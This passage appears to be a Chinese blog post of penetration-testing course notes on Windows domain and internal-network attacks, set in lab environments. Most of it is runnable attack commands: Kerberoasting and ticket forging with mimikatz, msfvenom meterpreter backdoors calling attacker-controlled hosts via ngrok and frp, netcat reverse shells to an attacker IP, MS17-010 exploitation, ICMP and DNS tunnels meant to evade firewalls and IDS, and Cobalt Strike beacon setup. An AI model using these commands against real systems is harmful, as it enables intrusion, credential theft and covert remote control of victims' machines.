<li>当计算机加入域时,主SPN会自动添加到域的计算机账号的ServicePrincipalName属性中。在安装新的服务后，SPN也会被记录在计算机账号的相应属性中。</li>
<li>SPN扫描也称为”扫描Kerberos服务实例名称”。在活动目录中发现服务的最佳方法就是SPN扫描。SPN扫描通过请求特定SPN类型的服务主体名称来查找服务。与网络端口扫描相比，SPN扫描的主要特点是不需要通过连接网络中的每个IP地址来检查服务端口(不会因为触发内网中的IPS、IDS等设备的规则而产生大量的警告日志)。因为SPN查询是Kerberos票据行为的一部分，所以检测难度很大。</li>
<li>由于SPN扫描是基于LDAP协议向域控制器进行查询的，所以，攻击者只需要获得一个普通的域用户权限，就可以进行SPN扫描。</li>
<li>在域环境中，发现服务的最好办法就是通过”SPN扫描”。通过请求特定SPN类型服务主体名称来查找服务。</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">1.探针</span><br><span class="line">setspn -q */*</span><br><span class="line">setspn -q */* | findstr &quot;MSSQL&quot;</span><br><span class="line"> </span><br><span class="line">2.请求票据</span><br><span class="line"><span class="meta">#</span><span class="bash"> 查看票据</span></span><br><span class="line">klist   </span><br><span class="line"><span class="meta">#</span><span class="bash"> 删除缓存票据</span></span><br><span class="line">klist purge</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash"> powershell请求</span></span><br><span class="line">Add-Type -AssemblyName System.IdentityModel</span><br><span class="line">New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList &quot;xxxx&quot;</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash"> mimikatz请求</span></span><br><span class="line">mimikatz.exe &quot;kerberos::ask /target:xxxx&quot;</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 查看票据</span></span><br><span class="line">klist</span><br><span class="line"> </span><br><span class="line">3.导出票据</span><br><span class="line"><span class="meta">#</span><span class="bash"> mimikatz</span></span><br><span class="line">mimikatz.exe &quot;kerberos::list /export&quot;</span><br><span class="line"> </span><br><span class="line">4.破解票据</span><br><span class="line"><span class="meta">#</span><span class="bash"> 破解工具tgsrepcrack.py python3环境运行</span></span><br><span class="line">python tgsrepcrack.py passwd.txt xxxx.kirbi</span><br><span class="line">python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi</span><br><span class="line"> </span><br><span class="line">5.重写票据(可能可以提权)</span><br><span class="line"><span class="meta">#</span><span class="bash"> kerberoast下载：https://github.com/nidem/kerberoast</span></span><br><span class="line">python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500</span><br><span class="line">python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512</span><br><span class="line">mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存</span><br><span class="line"> </span><br><span class="line">6.利用</span><br><span class="line">dir //xxx.xxx.xxx.xxx/c$</span><br></pre></td></tr></table></figure>


<h2 id="3-16域横向移动测试流程——Cobalt-Strike"><a href="#3-16域横向移动测试流程——Cobalt-Strike" class="headerlink" title="3.16域横向移动测试流程——Cobalt Strike"></a>3.16域横向移动测试流程——Cobalt Strike</h2><p>CobaltStrike4.0用户手册：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q">https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q</a> 提取码:dtm2<br>CS神器大概流程：启动-&gt;配置-&gt;监听-&gt;执行-&gt;上线-&gt;提权-&gt;信息收集(网络,凭证,定位等)-&gt;渗透<br>1.关于启动及配置讲解<br>2.关于提权及插件加载<br>3.关于信息收集命令讲解<br>4.关于视图自动化功能讲解</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> CobaltStrike Aggressor 脚本合集（可以自行在GitHub搜索）https://github.com/harleyQu1nn/AggressorScriptshttps://github.com/Und3rf10w/Aggressor-scriptshttps://github.com/001SPARTaN/aggressor_scriptshttps://github.com/rasta-mouse/Aggressor-Scripthttps://github.com/threatexpress/aggressor-scriptshttps://github.com/ramen0x3f/AggressorScriptshttps://github.com/FortyNorthSecurity/AggressorAssessorhttps://github.com/michalkoczwara/aggressor_scripts_collectionhttps://github.com/ars3n11/Aggressor-Scriptshttps://github.com/gaudard/scripts/tree/master/red-team/aggressorhttps://github.com/bluscreenofjeff/AggressorScriptshttps://github.com/vysecurity/Aggressor-VYSEChttps://github.com/killswitch-GUI/CobaltStrike-ToolKithttps://github.com/rsmudge/ElevateKit （第三方提权攻击）https://github.com/QAX-A-Team/CobaltStrike-Toolsethttps://github.com/DeEpinGh0st/Erebus （Erebus CobaltStrike后渗透测试插件，持续更新）https://github.com/branthale/CobaltStrikeCNAhttps://github.com/pandasec888/taowu-cobalt-strike（仓库已关闭）</span></span><br></pre></td></tr></table></figure>




<h1 id="4-内网漫游Socks代理技术"><a href="#4-内网漫游Socks代理技术" class="headerlink" title="4.内网漫游Socks代理技术"></a>4.内网漫游Socks代理技术</h1><p>必要基础知识点：<br>1.内外网简单知识</p>
<ul>
<li>内网ip地址是私有ip地址（10/8, 172.16/12 , 192.168/16），除此之外就是外网ip。</li>
</ul>
<p>2.内网1和内网2通信问题</p>
<ul>
<li>两个不同的内网的主机想要通过CS或者MSF等工具实现控制或者通讯是不可能的，必须要借助代理。</li>
</ul>
<p>3.正反向协议通信连接问题</p>
<ul>
<li>正向：控制端主动去连接被控端</li>
<li>反向：被控端主动去连接控制端</li>
<li>为什么要区分正向和反向？–因为如果控制端是外网主机，被控端是内网主机，就相当于控制端有一个唯一的IP地址（比如103.12.4.11），通过这个IP地址就可以找到控制端，而在内网的被控端（比如192.168.23.36），你通过控制端主动去找是找不到的，因为这个内网IP地址并不是唯一的，可能很多内网都用了这个IP地址，你根本没法找。此时就需要反向连接了，让内网的被控端主动去找外网的控制端。</li>
</ul>
<p>4.内网穿透代理隧道技术说明</p>
<ul>
<li><strong>隧道主要解决流量分析工具、流量监控工具、防火墙等相关工具的过滤问题</strong></li>
<li><strong>代理主要解决网络的连通性问题</strong></li>
</ul>
<p>内网渗透-横向渗透-穿透-代理相关知识点：</p>
<ul>
<li>代理技术主要解决3种问题：内网有外网，内网有过滤（防火墙），内网无外网（单纯主机服务器，无网络）</li>
<li>代理主要分为：正向代理和反向代理（以下案例均有涉及）</li>
<li>代理相关工具：nps、frp、ngrok、reGeorg、sockscap65、earthworm、proxifier、proxychains<ul>
<li>案例涉及工具：frp、ngrok、sockscap65、proxifier、proxychains</li>
<li>nps、reGeorg工具：案例未涉及，可自行学习</li>
<li>EarthWorm(简称EW)：已永久停止更新。</li>
</ul>
</li>
</ul>
<h2 id="4-1内网穿透Ngrok测试演示-两个内网通讯上线"><a href="#4-1内网穿透Ngrok测试演示-两个内网通讯上线" class="headerlink" title="4.1内网穿透Ngrok测试演示-两个内网通讯上线"></a>4.1内网穿透Ngrok测试演示-两个内网通讯上线</h2><p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637143073293-b51ba947-cb4d-48f9-9f09-080721f1e5aa.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1.注册-购买-填写-确认</span><br><span class="line"><span class="meta"> </span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 国外地址：</span></span><br><span class="line">https://ngrok.com/</span><br><span class="line"><span class="meta">#</span><span class="bash"> 国内地址：</span></span><br><span class="line">https://www.ngrok.cc/</span><br><span class="line">国外的比较卡慢，用国内的就行</span><br><span class="line">协议：http 本地端口：192.168.76.132:4444</span><br><span class="line"> </span><br><span class="line">2.测试：内网1执行后门-免费主机处理-内网2监听-内网2接受器</span><br><span class="line"> </span><br><span class="line">启动ngrok客户端</span><br><span class="line">./sunny clientid &lt;隧道id&gt;</span><br><span class="line"> </span><br><span class="line">在kali下生成后门（因为选择的是http协议，所以这里是reverse_http），并把后门test.exe复制到windows7</span><br><span class="line">msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe</span><br><span class="line"> </span><br><span class="line">配置并监听（一旦xiaodisec.free.idcfengye.com有流量，就发给本地192.168.76.132:4444）</span><br><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_http</span><br><span class="line">set lhost 192.168.76.132</span><br><span class="line">set lport 4444</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<h2 id="4-2Frp自建跳板测试-两个内网通讯上线"><a href="#4-2Frp自建跳板测试-两个内网通讯上线" class="headerlink" title="4.2Frp自建跳板测试-两个内网通讯上线"></a>4.2Frp自建跳板测试-两个内网通讯上线</h2><p>FRP说明文档：<a target="_blank" rel="noopener" href="https://gofrp.org/docs/">https://gofrp.org/docs/</a><br>Frp工具：<br>开源免费，自行搭建，方便修改，成本低，使用多样化，防止隐私泄露。而Ngrok工具使用的是别人的服务器，容易泄露隐私数据。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）# FRP下载地址https://github.com/fatedier/frp/releases服务器修改配置文件frps.ini：[common]bind_port = 6677# 可配置后台仪表盘，仪表盘的用户名和密码都是可选的# dashboard_port = 7500 # dashboard_user =admin# dashboard_pwd =admin启动服务端：./frps -c ./frps.ini 2.控制端-下载-解压-修改-启动控制端修改配置文件frpc.ini：[common]server_addr = 你的云主机ipserver_port = 6677 #frpc工作端口，必须和上面frps保持一致[msf]type = tcplocal_ip = 127.0.0.1local_port = 5555 #转发给本机的5555remote_port = 6000 #服务端用6000端口转发给本机 启动客户端(kali)：./frpc -c ./frpc.ini 生成后门：msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公网ip lport=6000 -f exe -o frp.exeuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT 5555exploit 3.靶机运行frp即可</span><br></pre></td></tr></table></figure>




<h2 id="4-3CFS三层内网漫游"><a href="#4-3CFS三层内网漫游" class="headerlink" title="4.3CFS三层内网漫游"></a>4.3CFS三层内网漫游</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Target1（centos7 x64）：探针目标-利用WEB漏洞(TP5_RCE)-获取webshell权限-获取Flag-Target2 1.生成后门：msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf &gt;t1.elf 2.接受反弹：msfconsoleuse exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset LHOST 192.168.76.132set LPORT 1111exploit 3.信息收集及配置访问获取网络接口：run get_local_subnets查看路由地址：run autoroute -p添加路由地址：run autoroute -s 192.168.22.0/24开启本地代理：use auxiliary/server/socks4aset srvport 2222set version 4a exploit 4.利用本地代理接口访问测试设置浏览器代理进行访问测试linux：配置proxychains（代理工具）后调用工具探针Target2/etc/proxychains.confsocks4 192.168.76.132 2222（在配置文件中添加）proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80 -Pn：扫描主机检测其是否受到数据包过滤软件或防火墙的保护。-sT：扫描TCP数据包已建立的连接connect windows：利用代理工具Proxifier或SocksCap64载入代理进行进程访问测试 Target2（ubuntu x64）：探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取Flag-Target3http://192.168.22.128/index.php?r=vul&amp;keyword=1 #sql注入http://192.168.22.128/index.php?r=admini/public/login #后台http://192.168.22.128/index.php?r=special #后门shell 1.生成正向后门：msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf &gt; t2.elf 2.访问接受：use exploit/multi/handlerset payload linux/x64/meterpreter/bind_tcpset rhost 192.168.22.128set LPORT 3333exploit 3.信息收集及配置访问获取网络接口：run get_local_subnets查看路由地址：run autoroute -p添加路由地址：run autoroute -s 192.168.33.0/24 Target3:（windows7 x64）探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GGproxychains4 nmap -Pn -sT 192.168.33.33use exploit/windows/smb/ms17_010_psexecset payload windows/meterpreter/bind_tcpset RHOST 192.168.33.33exploitshelldir /S flag.txt /Btype xxxxx.txt</span><br></pre></td></tr></table></figure>


<h1 id="5-网络-传输-应用层隧道技术"><a href="#5-网络-传输-应用层隧道技术" class="headerlink" title="5.网络/传输/应用层隧道技术"></a>5.网络/传输/应用层隧道技术</h1><p>必备知识点：<br>1.代理和隧道技术区别?</p>
<ul>
<li>代理只是为了解决网络通信问题，有些内网访问不到，可以用代理实现</li>
<li>隧道不仅是解决网络的通信问题，更大的作用是绕过过滤，突破防火墙/入侵检测系统。</li>
</ul>
<p>2.隧道技术为了解决什么?</p>
<ul>
<li>防火墙过滤问题、网络连接通信问题、数据回链封装问题</li>
<li>在数据通信被拦截的情况下，可以利用隧道技术封装改变通信协议进行绕过拦截。比如CS、MSF无法上线，数据传输不稳定无回显，出口数据被监控，网络通信存在问题等问题，都可以通过隧道技术解决。</li>
</ul>
<p>3.隧道技术前期的必备条件？</p>
<ul>
<li>在用隧道之前要先探测对应隧道协议是否支持，如果不支持，用这个隧道也没有任何意义！</li>
</ul>
<p>隧道原理</p>
<ul>
<li>在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。</li>
</ul>
<p>常用的隧道技术有以下三种：</p>
<ul>
<li>网络层：IPv6 隧道、ICMP 隧道</li>
<li>传输层：TCP 隧道、UDP 隧道、常规端口转发</li>
<li>应用层：SSH 隧道、HTTP/S 隧道、DNS 隧道</li>
</ul>
<h2 id="5-1网络-传输-应用层连通性检测"><a href="#5-1网络-传输-应用层连通性检测" class="headerlink" title="5.1网络/传输/应用层连通性检测"></a>5.1网络/传输/应用层连通性检测</h2><p>隧道有各种层面的，每个层面又分不同协议，你想要用哪个隧道，就需要先确定目标主机是否支持对应隧道协议。比如你想用一个网络层的 ICMP 隧道，这个时候你要去检测目标主机支不支持ICMP隧道的开启。怎么检测呢？可以使用ping命令去ping地址，看能不能正常通信，如果能的话就可以。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.TCP 协议用“瑞士军刀”——netcat执行 nc 命令：nc &lt;IP&gt; &lt;端口&gt; 2.HTTP 协议用“curl”工具，执行curl &lt;IP地址:端口&gt;命令。如果远程主机开启了相应的端口，且内网可连接外网的话，就会输出相应的端口信息 3.ICMP 协议用“ping”命令，执行ping &lt;IP地址/域名&gt; 4.DNS 协议检测DNS连通性常用的命令是“nslookup”和“dig”nslookup 是windows自带的DNS探测命令dig是linux系统自带的DNS探测命令</span><br></pre></td></tr></table></figure>


<h2 id="5-2网络层ICMP隧道Pingtunnel"><a href="#5-2网络层ICMP隧道Pingtunnel" class="headerlink" title="5.2网络层ICMP隧道Pingtunnel"></a>5.2网络层ICMP隧道Pingtunnel</h2><p>Pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具。为什么要转换？因为tcp、udp、sock5这几个协议受到防火墙和工具的拦截，这个工具就是把这些流量伪装成icmp进行数据传输！</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">网上介绍的大部分都是老牌工具，ptunnel工具几年前就没有更新了，不推荐使用。推荐pingtunnel，这个是一直在升级更新的一个工具。老版本介绍：https://github.com/f1vefour/ptunnel(需自行编译)新版本介绍：https://github.com/esrrhs/pingtunnel(二次开发版) 语法-p ##表示连接icmp隧道另一端的机器IP（即目标服务器）-lp ##表示需要监听的本地tcp端口-da ##指定需要转发的机器的IP（即目标内网某一机器的内网IP）-dp ##指定需要转发的机器的端口（即目标内网某一机器的内网端口）-x ##设置连接的密码</span><br></pre></td></tr></table></figure>

<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637203272138-88c5be8d-60c5-4bc5-81ce-f34b707a0293.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.ICMP隧道检测 # Webserver检测DCWebserver：ping 192.168.33.332.在webserver上开启隧道，设置密码为xiaodiWebserver：./ptunnel -x xiaodi3.在kali上执行以下命令，将webserver作为跳板，转发目标主机3389请求数据给本地1080端口Hacker xiaodi：./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodiHacker xiaodi：rdesktop 127.0.0.1 1080</span><br></pre></td></tr></table></figure>

<h2 id="5-3传输层转发隧道Portmap"><a href="#5-3传输层转发隧道Portmap" class="headerlink" title="5.3传输层转发隧道Portmap"></a>5.3传输层转发隧道Portmap</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">隧道技术：传输层端口转发</span><br><span class="line"> </span><br><span class="line">工具：</span><br><span class="line">windows: lcx</span><br><span class="line">linux：portmap</span><br><span class="line"> </span><br><span class="line">lcx是一个端口转发工具，通过端口转发的形式，将内网服务器的某一个端口映射到公网另一台服务器的一个端口上去！</span><br><span class="line">下载：https://github.com/MrAnonymous-1/lcx</span><br><span class="line"> </span><br><span class="line">命令：</span><br><span class="line"><span class="meta">#</span><span class="bash"> 将本地3389给攻击IP的3131</span></span><br><span class="line">DC：lcx -slave 192.168.3.31 6666 127.0.0.1 3389 </span><br><span class="line"><span class="meta">#</span><span class="bash"> 监听6666转发至7777</span></span><br><span class="line">webserver：lcx -listen 6666 7777 </span><br><span class="line"><span class="meta">#</span><span class="bash"> 连接webserver</span></span><br><span class="line">kali：rdesktop 192.168.76.143:7777</span><br></pre></td></tr></table></figure>

<p><img src="%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8.assets/1637205992563-57ed7731-8c5e-4a8d-b316-9eee2000f42c-164600289022026.png" alt="image.png"></p>
<h2 id="5-4传输层转发隧道Netcat"><a href="#5-4传输层转发隧道Netcat" class="headerlink" title="5.4传输层转发隧道Netcat"></a>5.4传输层转发隧道Netcat</h2><p>netcat工具是windows和linux都能利用，但是用的时候一定要确保nc是最新版，linux是自带这个命令，老版本有的不支持-e这个选项，很多功能会有限制。<br>netcat称为瑞士军刀的原因就是它利用起来非常方便，反弹会话是有很多方式的，可以利用多种协议去实现控制，因为我们在实战过程中会有很多协议被封住被拦截，所以我们要掌握很多种控制的协议，实战中就不会掉链子！<br>netcat使用的是TCP协议，所以如果受害主机没有过滤TCP协议，我们就可以尝试使用nc命令在传输层建立隧道连接实现与控制主机的通信。<br>​</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">1.双向连接反弹shell</span><br><span class="line">环境：攻击主机webserver（3.31）--&gt;受害主机DC（3.21）</span><br><span class="line"> </span><br><span class="line">正向-攻击连接受害</span><br><span class="line">受害：nc -ldp 1234 -e /bin/sh                      //linux（把shell会话反弹给1234端口）</span><br><span class="line">      nc -ldp 1234 -e c:\windows\system32\cmd.exe  //windows（把cmd反弹给1234端口）</span><br><span class="line">攻击：nc 受害主机IP 1234                           //主动连接</span><br><span class="line"> </span><br><span class="line">反向-受害连接攻击</span><br><span class="line">攻击：nc -lvp 1234                         //攻击主机监听自己的1234</span><br><span class="line">受害：nc 攻击主机IP 1234 -e /bin/sh</span><br><span class="line">      nc 攻击主机IP 1234 -e c:\windows\system32\cmd.exe</span><br><span class="line"> </span><br><span class="line">什么时候用正向，什么时候用反向？</span><br><span class="line">这是根据网络情况，如果受害主机可以找到你，就用反向，受害主机找不到你，就用正向。</span><br><span class="line"> </span><br><span class="line">2.多向连接反弹shell-配合转发</span><br><span class="line">环境：kali（76.132）--&gt;webserver（3.31、76.143）--&gt;sqlserver（3.32）</span><br><span class="line"> </span><br><span class="line">反向：</span><br><span class="line">god\Sqlserver：nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe //把cmd反弹给webserver的2222端口</span><br><span class="line">god\Webserver：lcx.exe -listen 2222 3333 //把自己的2222端口给3333</span><br><span class="line">kali或本机：nc 192.168.76.143 3333 //连接Webserver的3333端口（获取Sqlserver的cmd窗口数据）</span><br><span class="line"></span><br><span class="line">正向：（自己想的，未验证）？？？</span><br><span class="line">kali或本机：nc 192.168.76.143 2222 //连接Webserver的2222端口（获取Sqlserver的cmd窗口数据）</span><br><span class="line">god\Webserver：lcx.exe -listen 2222 3333 //把自己的2222端口给3333</span><br><span class="line">god\Sqlserver：nc 192.168.3.31 3333 -e c:\windows\system32\cmd.exe //把cmd反弹给webserver的3333端口</span><br><span class="line"></span><br><span class="line">思考：正向该怎么操作呢？实战中该怎么选择正向和反向？</span><br><span class="line"> </span><br><span class="line">3.相关netcat主要功能测试</span><br><span class="line">指纹服务：nc -nv 192.168.76.143</span><br><span class="line">端口扫描：nc -v -z 192.168.76.143 1-100</span><br><span class="line">端口监听：nc -lvp xxxx</span><br><span class="line">文件传输：nc -lp 1111 &gt;1.txt | nc -vn xx.xx.x.x 1111 &lt;1.txt -q 1</span><br><span class="line">反弹Shell：见上</span><br></pre></td></tr></table></figure>

<h2 id="5-5应用层DNS隧道配合CS上线"><a href="#5-5应用层DNS隧道配合CS上线" class="headerlink" title="5.5应用层DNS隧道配合CS上线"></a>5.5应用层DNS隧道配合CS上线</h2><p>应用层是在实战中经常用到的，之前两个层面会经常被防火墙拦截（网络/传输层），下面用DNS隧道来实现 cs上线。<br>cs的监听器对应着后门绑定的协议。常规是用http上线，dns比http速度要慢。当常见协议监听器被拦截时，可以换其他协议上线，其中dns协议上线基本通杀。因为dns是域名解析，这个协议一般都不会被拦截，数据通过dns协议给出去，一般也不会被拦截！<br>我们在生成监听器的时候有个payload，可以选择不同的协议。网上还有插件，还可以有很多其他协议。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">1.Teamserver配置端口53启用-udp</span><br><span class="line"> </span><br><span class="line">2.买一个域名修改解析记录如下：</span><br><span class="line">A记录-&gt;cs主机名-&gt;CS服务器IP</span><br><span class="line">NS记录-&gt;ns1主机名-&gt;上个A记录地址</span><br><span class="line">NS记录-&gt;ns2主机名-&gt;上个A记录地址</span><br><span class="line"> </span><br><span class="line">3.配置DNS监听器内容如下：</span><br><span class="line">ns1.xiaodi8.com</span><br><span class="line">ns2.xiaodi8.com</span><br><span class="line">cs.xiaodi8.com（Stager）</span><br><span class="line"></span><br><span class="line">4.生成后门</span><br><span class="line"><span class="meta">attacks--&gt;</span><span class="bash">packages--&gt;windows executable(s)--&gt;listener选择dns上线</span></span><br><span class="line">勾选--&gt;选择后门生成位置--&gt;生成后门（dns_x.exe）</span><br><span class="line"></span><br><span class="line">5.生成后门执行上线后启用命令：</span><br><span class="line"><span class="meta">beacon&gt;</span><span class="bash"> checkin</span></span><br><span class="line">[] Tasked beacon to checkin</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">beacon&gt;</span><span class="bash"> mode dns-txt</span></span><br><span class="line">[+] data channel set to DNS-TXT</span><br><span class="line">[+] host called home, sent: 8 bytes</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">beacon&gt;</span><span class="bash"> shell whoami</span></span><br><span class="line">[] Tasked beacon to run: whoami</span><br><span class="line">[+] host called home, sent: 53 bytes</span><br><span class="line">[+] received output:</span><br><span class="line">xiaodi-pc\xiaodi</span><br></pre></td></tr></table></figure>

<h1 id="6-MSF-amp-CobaltStrike联动"><a href="#6-MSF-amp-CobaltStrike联动" class="headerlink" title="6.MSF&amp;CobaltStrike联动"></a>6.MSF&amp;CobaltStrike联动</h1><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> cs-&gt;msf</span></span><br><span class="line">1.CS创建Foreign监听器</span><br><span class="line">2.MSF监听模块设置对应地址端口</span><br><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_http #这个payload要跟CS设置的payload保持一致</span><br><span class="line">set lhost 0.0.0.0 #不设置也行</span><br><span class="line">set lport 4444 #端口需要与cs监听器端口保持一致</span><br><span class="line">exploit</span><br><span class="line">3.CS执行Spawn选择Foreign监听器</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> msf-&gt;cs</span></span><br><span class="line">1.CS创建Beacon监听器</span><br><span class="line">2.MSF监听模块设置对应地址端口</span><br><span class="line">use exploit/windows/local/payload_inject</span><br><span class="line">set payload windows/meterpreter/reverse_http # 与CS监听器 一致</span><br><span class="line">set lport 5566 # 端口需要与cs监听器 一致</span><br><span class="line">set lhost 101.37.160.211 # IP设置为msf本地IP，与CS设置保持一致</span><br><span class="line">set session 4 # 选择会话</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>
</div></article></div></main><footer><div class="paginator"><a href="/2022/02/26/WAF%E7%BB%95%E8%BF%87/" class="prev">PREV</a><a href="/2021/12/22/Upload-labs%20Pass01-11/" class="next">NEXT</a></div><div class="copyright"><p>© 2021 - 2022 <a href="http://example.com">forg12</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/pinggod/hexo-theme-apollo" target="_blank">hexo-theme-apollo</a>.</p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script></body></html>